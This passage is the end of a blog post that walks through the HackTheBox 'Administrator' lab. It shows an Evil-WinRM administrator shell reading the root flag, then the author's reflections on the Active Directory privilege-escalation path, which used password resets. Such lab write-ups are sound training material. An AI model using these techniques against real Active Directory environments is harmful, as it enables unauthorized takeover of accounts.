*Evil-WinRM* PS C:\Users\Administrator&gt; cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop&gt; dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          1/4/2025   1:44 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop&gt; type root.txt
xxxxxxxxxxxxxxxxxxxxxxx
</pre></td></tr></tbody></table></code></div></div>

<h2 id="conclusion--thoughts"><span class="me-2">Conclusion &amp; Thoughts</span><a href="#conclusion--thoughts" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>This box is a very classic OSCP-Like box, it’s clear and concise, I never felt lost and always saw the next step very clearly. This is a great box if you’re new to AD and want to practice some classic AD privilege mismanagement. For me, this box felt a little too clear. I would’ve loved if there was some service I needed to exploit instead of resetting a password a second time to escalate to a different user or maybe an automated task run as Benjamin. The difficulty of the medium rating given to the machine is mostly in the number of steps, not the exploitation itself.</p>

<p>Though I must admit, sometimes HTB can be very difficult and obscure in it’s exploitation paths so this box was definitely positively refreshing after pwning UnderPass!</p>

<p>More writeups will come in the future, hope you enjoyed your read!</p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/pentesting/">Pentesting</a>,
          <a href="/categories/hackthebox/">HackTheBox</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/hackthebox/"
            class="post-tag no-text-decoration"
          >hackthebox</a>
        
          <a
            href="/tags/medium/"
            class="post-tag no-text-decoration"
          >medium</a>
        
          <a
            href="/tags/active-directory/"
            class="post-tag no-text-decoration"
          >active-directory</a>
        
          <a
            href="/tags/password-cracking/"
            class="post-tag no-text-decoration"
          >password-cracking</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Hack%20the%20box%20-%20Administrator%20-%20Archer's%20Blog&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FHTBAdministrator%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Hack%20the%20box%20-%20Administrator%20-%20Archer's%20Blog&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FHTBAdministrator%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FHTBAdministrator%2F&text=Hack%20the%20box%20-%20Administrator%20-%20Archer's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/HTBAdministrator/">Hack the box - Administrator</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox/">hackthebox</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/medium/">medium</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/password-cracking/">password-cracking</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  
    











            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Older">
      <p>-</p>
    </div>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Newer">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://twitter.com/username">Gilad Asher Chen</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hackthebox/">hackthebox</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/medium/">medium</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/password-cracking/">password-cracking</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

